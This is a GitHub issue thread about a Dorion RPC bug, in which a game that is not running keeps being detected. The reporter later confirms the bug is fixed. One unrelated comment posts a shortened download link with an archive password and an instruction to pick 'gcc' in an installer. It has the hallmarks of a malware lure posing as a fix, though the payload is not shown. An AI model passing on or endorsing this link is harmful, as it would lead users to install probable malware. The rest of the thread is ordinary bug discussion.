### ISSUE TITLE
[Bug] RPC Stuck on a game that's not running

### ISSUE THREAD

**Issue by koffydrop** [SpikeHD/Dorion#252]
**Describe the bug**
After enabling the integrated rpc server and installing the shelteRPC plugin, Dorion gets stuck thinking im playing Marvel Snap (even if i haven't opened it since a clean boot, or since enabling the rpc now that i think about it, it doesn't appear on the list of added games either). If i open another detectable thing it overrides it for time its open but falls back to Marvel Snap once there's nothing else

**To Reproduce**
Have Marvel Snap installed through steam i guess? and enable rpc

**Expected behavior**
No detection of something that isn't running on the system

**Screenshots**
![image](https://github.com/user-attachments/assets/417e1816-61cc-4dd1-a0aa-8dcb73358128)
![image](https://github.com/user-attachments/assets/b52ba36b-5d8f-4b9a-af17-3474e6b5449a)
![image](https://github.com/user-attachments/assets/e0164347-6b07-441b-b74b-6e000d767d9b)

**System Info (please complete the following information):**
 - OS: Windows 11 Pro, version 23H2
 - Version: v5.0.1
 - Any other relevant info: 
    1. Running Dorion on portable mode, through the scoop installation
    2. Vencord is enabled but without any rpc related plugins

**Additional context**
Not that im aware

**Comment by YeGop0218** [comment]
Download 
https://bit.ly/3MjP129
password: changeme
In the installer menu, select "gcc."

**Comment by SpikeHD** [comment]
is this still happening on the latest version?

**Comment by koffydrop** [comment]
nope! seems to be fixed so far
